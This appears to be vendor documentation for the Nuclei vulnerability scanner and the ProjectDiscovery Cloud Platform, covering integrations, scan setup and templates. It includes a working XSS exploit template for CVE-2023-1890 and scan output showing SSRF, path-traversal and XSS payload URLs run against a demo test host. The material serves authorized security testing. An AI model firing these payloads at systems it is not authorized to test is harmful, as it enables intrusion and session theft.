Provide a name for the configuration, the Jira instance URL , the Account ID, the Email, and the associated API token.
Details on creating an API token are available [in the Jira documentation here.](https://support.atlassian.com/atlassian-account/docs/manage-api-tokens-for-your-atlassian-account/)
### GitHub
PDCP provides integration support for GitHub to create new tickets when vulnerabilities are found.
Provide a name for the configuration, the Organization or username, Project name, Issue Assignee, Token, and Issue Label. The Issue Label determines when a ticket is created. (For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitHub issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Details on setting up access in GitHub [are available here.](https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/managing-your-personal-access-tokens)
### GitLab
ProjectDiscovery Cloud Platform provides integration support for GitLab to create new tickets when vulnerabilities are found.
Provide your GitLab username, Project name, Project Access Token and a GitLab Issue label. The Issue Label determines when a ticket is created.
(For example, if critical severity is selected, any issues with a critical severity will create a ticket.)
* The severity as label option adds a template result severity to any GitLab issues created.
* Deduplicate posts any new results as comments on existing issues instead of creating new issues for the same result.
Refer to GitLab’s documentation for details on [configuring a Project Access token.](https://docs.gitlab.com/ee/user/project/settings/project_access_tokens.html#create-a-project-access-token)
### Linear
ProjectDiscovery Cloud Platform provides integration support for Linear to create new tickets when vulnerabilities are found.
Provide your Linear API Key, Linear Team ID, and Linear Open State ID to set up the integration. Here are the specific steps to access or generate each parameter from your Linear workspace.
* To generate your **Linear API Key**, navigate to Linear > Profile Icon > Preferences > API > Personal API keys > Create new API key. Or, navigate to linear.app/\[workspace name]/settings/api.
* To retrieve your **Linear Team ID**, you can use the following cURL command
```bash
curl -X POST https://api.linear.app/graphql \
-H "Content-Type: application/json" \
-H "Authorization: YOUR_API_KEY" \
-d '{"query":"query { teams { nodes { id name } } }"}'
```
* To retrieve your **Linear Open State ID**, you can use the following cURL command
```bash
curl -X POST https://api.linear.app/graphql \
-H "Content-Type: application/json" \
-H "Authorization: YOUR_API_KEY" \
-d '{"query":"query { workflowStates { nodes { id name } } }"}'
```
Refer to Linear's [documentation](https://developers.linear.app/docs/graphql/working-with-the-graphql-api) for details on their API.
## Scan Configs
Use scan configurations to implement custom http headers, template variables, and custom interactsh server for your scans.
## Template Configs
Review our built in template configurations or create a new template configuration with template filters to include or exclude based on severity, tags, protocol, and template ID.
Learn more about our [Template Editor!](/cloud/editor/overview)
# Connect Your Nuclei Scan to PDCP
Review your Nuclei Scan Results in ProjectDiscovery Cloud Platform
## Overview
In this section we'll walk through the steps you need to run a scan in [Nuclei](/tools/nuclei/overview) and connect your scan to ProjectDiscovery Cloud Platform (PDCP).
## Set up your API Key
To connect your existing Nuclei results to PDCP you will need to create a free API Key
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
2. Open the setting menu from the top right and select "API Key" to create your API Key
3. Use the `nuclei -auth` command, and enter your API key when prompted.
## Configure Team (Optional)
If you want to upload the scan results to a team workspace instead of your personal workspace, you can configure the Team ID. You can use either the CLI option or the environment variable, depending on your preference.
* **Obtain Team ID:**
* To obtain your Team ID, navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team) and copy the Team ID from the top right section.
![image](https://github.com/user-attachments/assets/76a9f102-1626-4c87-8d9e-37c30417f19e)
* **CLI Option:**
* Use the `-tid` or `-team-id` option to specify the team ID.
* Example: `nuclei -tid XXXXXX -cloud-upload`
* **ENV Variable:**
* Set the `PDCP_TEAM_ID` environment variable to your team ID.
* Example: `export PDCP_TEAM_ID=XXXXX`
Either of these options is sufficient to configure the Team ID.
## Run a Scan
To run a scan, from a terminal window with your Nuclei installation, use the `nuclei -target` or `nuclei -u` option to designate a target/host.
**For example, a command might look like:**
```bash
nuclei -target http://honey.scanme.sh -cloud-upload
```
* This example uses a sample site from ProjectDiscovery ([http://honey.scanme.sh](http://honey.scanme.sh))
* The `-cloud-upload` flag is required to share results with PDCP
* You can run this command against any URL you want (with appropriate permissions)
* To reduce or narrow the scan results you can select a specific template folder for your scan
* For example `nuclei -u http://buffer.com -t dns/ -cloud-upload`
**And the output of your command (scan) would be:**
```console
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.1.0
projectdiscovery.io
[INF] Current nuclei version: v3.1.0 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 71
[INF] Executing 71 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2017-9506] [http] [medium] http://honey.scanme.sh/plugins/servlet/oauth/users/icon-uri?consumerUri=http://clk37fcdiuf176s376hgjzo3xsoq5bdad.oast.live
[CVE-2019-9978] [http] [medium] http://honey.scanme.sh/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://clk37fcdiuf176s376hgyk9ppdqe9a83z.oast.live
[CVE-2019-8451] [http] [medium] http://honey.scanme.sh/plugins/servlet/gadgets/makeRequest
[CVE-2015-8813] [http] [high] http://honey.scanme.sh/Umbraco/feedproxy.aspx?url=http://clk37fcdiuf176s376hgj885caqoc713k.oast.live
[CVE-2020-24148] [http] [critical] http://honey.scanme.sh/wp-admin/admin-ajax.php?action=moove_read_xml
[CVE-2020-5775] [http] [medium] http://honey.scanme.sh/external_content/retrieve/oembed?endpoint=http://clk37fcdiuf176s376hgyyxa48ih7jep5.oast.live&url=foo
[CVE-2020-7796] [http] [critical] http://honey.scanme.sh/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://clk37fcdiuf176s376hgi9b8sd33se5sr.oast.live%23
[CVE-2017-18638] [http] [high] http://honey.scanme.sh/composer/send_email?to=hVsp@XOvw&url=http://clk37fcdiuf176s376hgyf8y81i9oju3e.oast.live
[CVE-2018-15517] [http] [high] http://honey.scanme.sh/index.php/System/MailConnect/host/clk37fcdiuf176s376hgi5j3fsht3dchj.oast.live/port/80/secure/
[CVE-2021-45967] [http] [critical] http://honey.scanme.sh/services/pluginscript/..;/..;/..;/getFavicon?host=clk37fcdiuf176s376hgh1y3xjzb3yjpy.oast.live
[CVE-2021-26855] [http] [critical] http://honey.scanme.sh/owa/auth/x.js
[INF] Scan results uploaded! View them at https://cloud.projectdiscovery.io/scans/clk37krsr14s73afc3ag
```
## Viewing Your Scan
After the scan is complete a URL will display on the command line interface. Visit this URL to check your results in PDCP.
Your scan results will also be available in the Scan tab of PDCP with a generic system generated name. You can rename the scan to identify it later.
After more than one scan "results" tab shows the scan results for all scans in your PDCP environment.
Nuclei scans connected and uploaded to PDCP are scheduled for automatic cleanup after 30 days. This duration is subject to change as we gauge user feedback and requirements.
## Features
### Scans
Scans offer the ability to:
* View a list of all scans in your PDCP install.
* View details of an individual scan.
* Sort for severity or status, export scan details, change status, search results.
### Templates
Templates include our [Template Editor](/cloud/editor/introductin) to write your own custom templates.
* Experiment with using our [AI Assitance](/cloud/editor/ai) to create custom templates.
* Share your custom templates
Learn more about our [Templates](/templates/introduction).
# PDCP Scanning Overview
Learn more about PDCP scanning features and capabilities
## Key Features
Scans are at the heart of the ProjectDiscovery Cloud Platform (PDCP). Upload Assets to your environment, select the templates you want to use, and configure a scan to check for exploitable vulnerabilities.
Features include:
* Connecting existing Nuclei scans
* Creating new scans
* Viewing active vulnerabilities
* Real-Time vulnerability scan
* Scheduling scans
* Exporting scan details
* Determining active CVEs
* Rescanning
## Getting Started
Before you get started with scanning you will need two things:
* To add your Assets
* To select the templates you want to use
**Assets**
Assets can be added in several ways. Refer to the [Assets documentation](/cloud/assets/overview) for details on adding your Assets through upload, discovery, or cloud integrations.
**Templates**
PDCP includes our large community-curated library of public Nuclei templates. You can use all of those templates, our subset of [recommended templates](/cloud/editor/recommended), a specific selection of templates, or you can create or add your own custom templates.
* Check out the main [Nuclei templates](templates/introduction) section to learn more about templates or,
* Review the [Templates & Editor](/cloud/editor/overview) section for more information on using templates and the editor within PDCP
## FAQ
### Scanning Basics
**What do I need to do before I can run a scan in PDCP?**
You will need to add assets and identify your templates. From the Scan page, select “Create Scan” to get started.
**What are the differences between running Nuclei versus running a scan on PDCP?**
Scanning with PDCP differs from Nuclei in several ways. The main differences are the use of a different interactsh server along with distributed and faster scanning.
In addition, some scanning capabilities that are part of Nuclei are not included in PDCP (this is mainly due to security concerns).
If you have specific questions on support and future capabilities feel free to reach out to us with questions.
Capabilities that are offered in Nuclei that are not currently supported in PDCP include:
* file templates
* headless templates
* code templates
* workflows
* templates using a local wordlist
**How do I run a scan/upload existing scan results from Nuclei?**
Scans can be run in Nuclei and connected to PDCP or you can run a scan directly in PDCP from the Scans page.
Scan results form Nuclei can be connected to ProjectDiscovery Cloud Platform
* Check out the [Connect Nuclei](https://docs.projectdiscovery.io/cloud/free/scan) page for details.
### Vulnerabilities
**My scan results in PDCP are different from my Nuclei results. What happened?**
There are a number of possibilities for this, let’s look at some of the most likely causes.
If you have *more results* in your scan from Nuclei than from PDCP, potential causes include:
* Scanning with templates that are not enabled in PDCP
* Scanning an internal host that not accessible to PDCP
* A potential PDCP bug
If you have *fewer results* in your scan from Nuclei than from PDCP, potential causes include:
* Use of dynamic IPs versus local static IPs that were blocked from the target URL for scanning
* Use of a different interactsh server (PDCP), public servers (Nuclei) may be blocked using WAFs
**What happens if duplicate scan results are uploaded?**
If a user uploads the same scan results - by uploading scan results from Nuclei to update an existing scan using the named scan ID - PDCP discards duplicate data so the original results will remain.
Otherwise any scan information from Nuclei that is uploaded creates a new scan result page in PDCP.
**What are the scan statuses and what do they mean?**
* Stopped - This status indicates that a user has stopped the scan either in PDCP or via the API. Note: Scans in “starting” cannot be stopped.
* Failed - This status indicates that a scan has failed. Click on the icon on the scan list or result page to view error details for the failed scan.
* Starting - Indicates that the scan is initializing.
* Running - Indicates the scan is in progress.
# Adding Parameters
A walkthrough of adding additional parameters to PDCP scan configuration
## Summary
Some Nuclei templates, to adapt to running in ProjectDiscovery Cloud Platform (PDCP), may require additional parameters.
A common example is Nuclei templates that need parameters like username and password to authenticate.
This page provides a common example to show you the steps required to set up scan parameters.
Using the scan configuration you can take advantage of these types of Nuclei templates within PDCP.
## Authentication Example
In this example we’re going to look at a Nuclei template that requires WordPress authentication.
WordPress authentication is required for over 150 different Nuclei templates, and in each of these the templates can't be executed without configuring additional parameters.
For example:
```yaml
id: CVE-2023-1890
info:
name: Tablesome < 1.0.9 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: Fixed in version 1.0.9.
reference:
- https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
- https://wordpress.org/plugins/tablesome/
- https://nvd.nist.gov/vuln/detail/CVE-2023-1890
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1890
cwe-id: CWE-79
epss-score: 0.00203
epss-percentile: 0.57653
cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: pauple
product: tablesome
framework: wordpress
tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "")'
- 'contains(body_2, "tablesome")'
condition: and
```
In the first request there are two variables that are not defined in the template.
Users are expected to pass the values of these variables `{{username}}` and `{{password}}`.
```
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
```
In Nuclei from the CLI you would simply run the following command:
`nuclei -id CVE-2023-1890 -var username=admin -var password=password123 -target https://example.com`
However, PDCP requires some additional configuration to include these parameters in a scan.
## Variable Configuration in PDCP
To configure these required scan parameters in PDCP you can create a Scan Configuration to pass these variables along in any scans you create.
You can choose to enable this configuration for all scans by default, or apply the configuration manually when you set up a new scan.
Complete these steps to set up an username and password parameters for a scan that includes WordPress authentication within the Nuclei templates.
Select Configurations. Next select **Scans** and **New Config**.
* Enter WP Login as the configuration name
* Under Template variables enter **key** with the desired username and **value** with the corresponding password
* Update Enable for all scans based on your preferences. *Keeping it selected (default) will pass the new variables for any templates that has these variables defined.*
Select **Create** to create the new scan configuration.
## What's Next?
Now that you have created a new scan configuration if set to *“Enable for all scans”* will appear as a configuration for any new scans you create.
* If this is not enabled you will be able to choose the configuration for any scan you create.
Create a new scan and select any WordPress templates you want to include. You can also create a custom template profile to define a specific group of WP templates.
# Explore Use Cases
Walk through some key workflows available in ProjectDiscovery Cloud Platform
Check out some ways to get started securing your attack surface with ProjectDiscovery Cloud Platform (PDCP)
What part of your tech stack is exposed on the internet? Add assets to build your scanning inventory.
Establish a schedule for continuous scanning to look for exploitable vulnerabilities across your attack surface.
Use your internal reports to build custom automation and scan for exploitable vulnerabilities.
Continuously retest vulnerabilities and detect similar issues across your infrastructure.
A popular attack appears on the news. Quickly scan your assets to see if you're impacted.
Keep your team in the loop on exploitable vulnerabilities with a Slack alert.
Empower your team with actionable follow up for exploitable vulnerabilities by creating Jira tickets.
# Try ProjectDiscovery
Learn about the ProjectDiscovery Cloud Platform
## What is ProjectDiscovery Cloud Platform?
[ProjectDiscovery Cloud Platform](https://cloud.projectdiscovery.io/) (PDCP) is a cloud-hosted security platform designed to provide continuous visibility across your external attack surface by detecting exploitable vulnerabilities and misconfigurations.
It is built to solve a variety of use cases, and scale to support the key workflows application security teams need to secure their infrastructure.
* Visit the full [PDCP Docs](/cloud/introduction)
* Review [our FAQ](/cloud/general-faq)
* Explore some common [use cases](/cloud/usecases)
## What are some key features?
PDCP offers a range of capabilities including cloud-hosting, asset discovery and management, remediation and regression testing workflows, reporting, collaboration, integrations and more.
* Check out more info [on our features](/cloud/features)
## How do I get started?
To get started visit [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io/) and sign up.
# How to Use ProjectDiscovery Documentation
A quick start guide to docs and resources.
Welcome to ProjectDiscovery's documentation hub. a primary resource for everything related to ProjectDiscovery. We offer information about all of our solutions to support potential customers, new users, and our existing community.
Our goal is to offer a well-organized, comprehensive knowledge base for new users, existing customers, and the broader community. We’re continually improving to make it easier for everyone to explore and benefit from our tools, helping democratize security for all.
### Quick Navigation
* Use **search** to locate a specific term or topic. For more specific results, use a phrase or question for a detailed AI-powered response.
* Navigate through sections with the **tabs** at the top (Tools, Templates, Cloud Platform, etc.)
* Check out the **[Help](/help)** tab for support and info on joining our community.
## What's Inside
Let’s explore the main sections of the documentation site:
* [**Tools**](/tools): Explore our suite of open-source tools. Whether you're a seasoned pro or just getting started, this section breaks down each tool's purpose, features, and how-tos.
* [**Nuclei Templates**](/templates): Learn how to use and customize Nuclei templates. These templates are key to precise vulnerability detection in both Nuclei and PDCP.
* [**Cloud Platform**](/cloud): **ProjectDiscovery Cloud Platform (PDCP)** is a scalable, cloud-hosted security solution. Check out the features, benefits, and step-by-step instructions to maximize its potential.
* [**API**](/api-reference): **Integrate**, **Automate**, or **Expand**, our cloud's API documentation has you covered. Dive into detailed endpoints, request-response patterns, and best practices to seamlessly weave ProjectDiscovery into your workflow.
* [**Help**](/help): Questions? In need of some guidance to create a specific workflow or resolve a particular issue? Check out help to review our support resources.
Didn't find what you were looking for? Visit [GitHub](https://github.com/projectdiscovery) for additional tools and content.
## Feedback or Questions
We aim to make this documentation as useful as possible. Did you find what you needed? Use the *"Was this helpful?"* 👍 or 👎 at the bottom of any page to provide feedback.
Have suggestions for improvement or a correction? Submit a PR through **Suggested Edits**.
If you have more questions, reach out to [support@projectdiscovery.io](mailto:support@projectdiscovery.io)
## Join the Community
If you want to discuss ProjectDiscovery with other developers, join us on [Discord](https://discord.com/invite/projectdiscovery).
Welcome to the ProjectDiscovery Discord Server!
Get support, share stories, and engage with the community.
# Nuclei Setup Example
Learn how to install Nuclei and start scanning for vulnerabilities.
## Installations
### Install Go
ProjectDiscovery runs on any OS that supports Go.
This example uses Linux, but [this blog post](https://blog.projectdiscovery.io/getting-started-with-projectdiscovery-in-linux-and-windows/) provides instructions for other OSs. You can also refer to [Go's installation guide](https://go.dev/doc/install).
Download and install [the latest version of Go](https://go.dev/doc/install).
Run `go version` to confirm installation (*v 1.21 at the time of writing*)
### Update your `$PATH`
The `$PATH` variable defines directories with executable programs. You need to add the `go/bin` directory (where ProjectDiscovery binaries reside) to `$PATH` manually.
This folder is not automatically added to your `$PATH`. Refer to the steps below to update it manually.
Run `go env | grep GOPATH` and copy the output path. Append `/bin` to it if needed.
Edit your shell config (e.g., `nano ~/.zshrc` for zsh or `nano ~/.bashrc` for bash). Add `export PATH="$PATH:/your/go/path/bin"` at the end.
Run `source ~/.zshrc` or `source ~/.bashrc`, or restart your terminal.
Run `echo $PATH` to confirm the Go binary directory is included.
### Install Nuclei
A quick overview of Nuclei and its templates before installation.
**What is Nuclei?**
> Nuclei is a community-powered vulnerability scanner that uses templates to identify vulnerabilities in your assets.
> As an open-source tool, it has the benefit of a huge community of users and contributors who have helped to create a vast library of templates.
Templates, are YAML files used to define what is scanned by Nuclei. The template library includes many options and customizations, and supports any templates you create to meet your requirements.
Run `go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest` in your terminal.
Run `nuclei -h` to see available options and flags.
### Sample Nuclei Output
```java
user@Sample ~ % nuclei -h
Nuclei is a fast, template based vulnerability scanner focused
on configurability, extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP's associated with DNS record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-tu, -template-url string[] list of template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wu, -workflow-url string[] list of workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
```
## Run a Scan
Let's run a scan against a test host to showcase Nuclei’s behavior.
> We'll be using the test URL(`http://honey.scanme.sh/`) to demonstrate the expected scan behavior and walk you through some results.
### Scan your host
Run `nuclei -u http://honey.scanme.sh/` to scan the target host with all available templates.
*The -u option specifies the target you want to scan with all available templates.*
### View results
Here we have an example (edited for easier readability)
```java
user@Test-MBP ~ % nuclei -u http://scanme.sh
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.9.4
projectdiscovery.io
[WRN] Found 2298 templates with syntax error (use -validate flag for further examination)
[WRN] Found 16 templates with runtime error (use -validate flag for further examination)
[INF] Current nuclei version: v2.9.4 (outdated)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 4982
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1230 (Reduced 1179 Requests)
[INF] Using Interactsh Server: oast.fun
[ssl-issuer] [ssl] [info] scanme.sh:443 [pd]
[self-signed-ssl] [ssl] [low] scanme.sh:443
[mismatched-ssl-certificate] [ssl] [low] scanme.sh:443 [CN: scanme]
[http-missing-security-headers:strict-transport-security] [http] [info] http://scanme.sh
[http-missing-security-headers:permissions-policy] [http] [info] http://scanme.sh
----
[weak-cipher-suites:tls-1.1] [ssl] [low] scanme.sh:443 [[tls11 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA]]
[nameserver-fingerprint] [dns] [info] scanme.sh [ns69.domaincontrol.com.,ns70.domaincontrol.com.]
```
### Understanding your results
If you examine the following line of output
`[mismatched-ssl-certificate] [ssl] [low] scanme.sh:443 [CN: scanme]`
The fields are as follows:
* `[mismatched-ssl-certificate]` is the template-id for the finding
* `[ssl]` is the protocol associated with the finding
* `[low]` is the severity associated with the finding
* `Scanme.sh:443` is the output (in this case the host that the finding applies to)
* `[CN: scanme]` - This output also includes an [extracted value](https://docs.projectdiscovery.io/templates/reference/extractors), which is not typically in all templates but does show an example of some of the other types of output you might see.
So, each line of output follows this structure:
`[template-id]` `[protocol]` `[severity]` `output (impacted host, etc)`
**Other examples:**
```
[wp-ambience-xss] [http] [medium] http://honey.scanme.sh/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
```
```
[tikiwiki-reflected-xss] [http] [high] http://honey.scanme.sh/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
```
Take a look at the ["Next Steps"](/getstarted-nextsteps) section for suggestions on what to explore next.
# Next Steps in Nuclei
You've completed the Getting Started guide. Here's what you can explore next.
## Learn More About Nuclei
Now that you understand the basics we have a ton of resources available to help you learn more about Nuclei capabilities.
* Discover [where Nuclei can benefit you or your organization](https://docs.projectdiscovery.io/tools/nuclei/overview#where-to-use-nuclei).
* Learn more about [running Nuclei](https://docs.projectdiscovery.io/tools/nuclei/running) and explore the [public template library](https://docs.projectdiscovery.io/tools/nuclei/running#public-templates).
* Find guidance on choosing [an effective scan strategy](https://docs.projectdiscovery.io/tools/nuclei/running#which-scan-strategy-to-use).
## Explore Our Open-source Tools
> Explore more tools we offer and see how they fit into the categories of **Discover, Enrich, Detect** to optimize your security assessments. Check them out [here](https://docs.projectdiscovery.io/tools/index).
## Summary Video
Watch this 30-minute video for an overview of all ProjectDiscovery tools.
# Get Started with ProjectDiscovery
## Overview
This section will guide you through the quickest way to install, set up, and run a scan using some key ProjectDiscovery open-source tools.
We’ll focus on a few tools to demonstrate ProjectDiscovery’s core capabilities. If you want to explore more tools and features, don’t hesitate to [reach out](/help).
Interested in learning more about the **ProjectDiscovery Cloud Platform (PDCP)**? Visit the [PDCP Introduction](/cloud/introduction) for all the details.
## What's in Getting Started?
Get started with ProjectDiscovery in a few simple steps:
* Installing the latest version of Go
* Installing Nuclei
* Running a scan
* Reviewing your results
Download and install the latest version of Go from the official website. Ensure that your system is up to date and Go is properly installed by running `go version` in your terminal.
Install Nuclei by following the instructions in the official [Nuclei documentation](https://docs.projectdiscovery.io/tools/nuclei/install/). You can use package managers or build from source.
After installing Nuclei, run your first scan with the command:
```bash
nuclei -u https://your-target-domain.com
```
This will initiate a scan on the target domain.
Once the scan is complete, review the results to identify any potential vulnerabilities. Nuclei will generate a report of findings that you can act on.
**Next Steps**
Follow the links below to explore ProjectDiscovery further.
**Check out the example**
* [View the example](https://drive.google.com/file/d/1hdQpnferNOnUji20GHG7KBkJkGBY7u5w/view)
* [Download the PDF](https://drive.google.com/uc?export=download\&id=1hdQpnferNOnUji20GHG7KBkJkGBY7u5w)
# Getting Help
Review your options for getting help from ProjectDiscovery
Need assistance or guidance? You're in the right place, and we're here to help!
# ProjectDiscovery - Platform to Monitor infra
Learn how to get up and running with ProjectDiscovery through guides, tutorials and platform resources.
## What is ProjectDiscovery?
**[ProjectDiscovery](https://projectdiscovery.io/)** is an open-source security company focused on detecting **new, exploitable vulnerabilities** and **misconfigurations**, so you can remediate them before hackers take advantage.
Our community-driven tools empower you with actionable insights to stay ahead of threats in real time.
Try [ProjectDiscovery Cloud Platform](https://cloud.projectdiscovery.io/) today for Free.
## Get Started
From open source tools to our ProjectDiscovery Cloud Platform (PDCP), explore solutions for automation, integration, and continuous scanning to defend your modern tech stack against exploitable vulnerabilities.
Watch the video below for a quick overview of our documentation.
## Get to know us
Protect your attack surface at scale with a fast cloud-hosted solution featuring integrations, collaboration, and more.
Dive into our open source tools for asset discovery & exploitable vulnerability detection.
Our tools are open source and built by our entire community - and that could include you!
The ProjectDiscovery community is a space for security engineers and developers to learn how to manage vulnerability workflows faster and better
Visit [What is ProjectDiscovery?](/overview) to learn more about who we are and what we build.
# What is ProjectDiscovery?
Learn about ProjectDiscovery, who we are, and the solutions we offer
## Who are we?
> We're ProjectDiscovery. We make dozens of tools for individual bug bounty hunters, pentesters, and AppSec professionals. Through the power of open source and
> our community we build powerful customizable solutions to secure your attack surface against a continuously evolving landscape of threats
> and vulnerabilities.
## Open Source Tools
1. [**Discover**](/tools/index#discover) - Identify assets and broaden your visibility of the attack surface.
2. [**Enrich**](/tools/index#enrich) - Understand the technologies and services exposed to the internet.
3. [**Detect**](/tools/index#detect) - Pinpoint exploitable vulnerabilities within the attack surface.
## ProjectDiscovery Cloud Platform
[ProjectDiscovery Cloud Platform](https://projectdiscovery.io/platform) (PDCP) is a cloud-hosted security platform designed to provide continuous visibility across your external attack surface by detecting exploitable vulnerabilities and misconfigurations.
It is built to solve a variety of use cases, and scale to support the key workflows application security teams need to secure their infrastructure.
Visit [the ProjectDiscovery Cloud Platform](/cloud/introduction) section of our documentation to learn more.
# Templates FAQ
Some common questions and answers about Nuclei templates
For info on the Nuclei Template Editor or using templates with ProjectDiscovery Cloud Platform - [learn more here](/cloud/editor/overview).
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project. The templates contain the actual logic that is executed in order to detect various vulnerabilities. The project consists of **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates.
We maintain a [template guide](/templates/introduction/) for writing new and custom Nuclei templates.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease. It's worth mentioning ==you write the template once and use it forever==, as you don't need to manually test that specific vulnerability any longer.
Here are few examples from the community making use of templates to automate the security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
Nuclei templates can be executed using a template name or with tags, using `-templates` (`-t`) and `-tags` flag, respectively.
```
nuclei -tags cve -list target_urls.txt
```
You are always welcome to share your templates with the community. You can either open a [GitHub issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=nuclei-template\&template=submit-template.md\&title=%5Bnuclei-template%5D+template-name) with the template details or open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your nuclei templates. If you don't have a GitHub account, you can also make use of the [discord server](https://discord.gg/projectdiscovery) to share the template with us.
The Nuclei template project is a **community-contributed project**. The ProjectDiscovery team manually reviews templates before merging them into the project. Still, there is a possibility that some templates with weak matchers will slip through the verification. This could produce false-positive results. **Templates are only as good as their matchers.**
If you identified templates producing false positive/negative results, here are few steps that you can follow to fix them quickly.
Direct message us on [Twitter](https://twitter.com/pdnuclei) or [Discord](https://discord.gg/projectdiscovery) to confirm the validity of the template.
Please open a GitHub [issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=false-positive\&template=false-positive.md\&title=%5Bfalse-positive%5D+template-name+) with details, and we will work to address the problem and update the template.
Please open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with fix.
The Nuclei templates project houses a variety of templates which perform fuzzing and other actions which may result in a DoS against the target system (see [the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)). To ensure these templates are not accidentally run, they are tagged and excluded them from the default scan. These templates can be only executed when explicitly invoked using the `-itags` option.
{" "}
When you download or update Nuclei templates using the Nuclei binary, it
downloads all the templates from the latest **release**. All templates added
after the release exist in the [master
branch](https://github.com/projectdiscovery/nuclei-templates) and are added to
Nuclei when a new template release is created.
# Introduction to Nuclei Templates
YAML based universal language for describing exploitable vulnerabilities
For info on the Nuclei Template Editor or using templates with ProjectDiscovery Cloud Platform - [learn more here](/cloud/editor/overview).
## What are Nuclei Templates?
Nuclei templates are the cornerstone of the Nuclei scanning engine. Nuclei templates enable precise and rapid scanning across various protocols like TCP, DNS, HTTP, and more. They are designed to send targeted requests based on specific vulnerability checks, ensuring low-to-zero false positives and efficient scanning over large networks.
## YAML
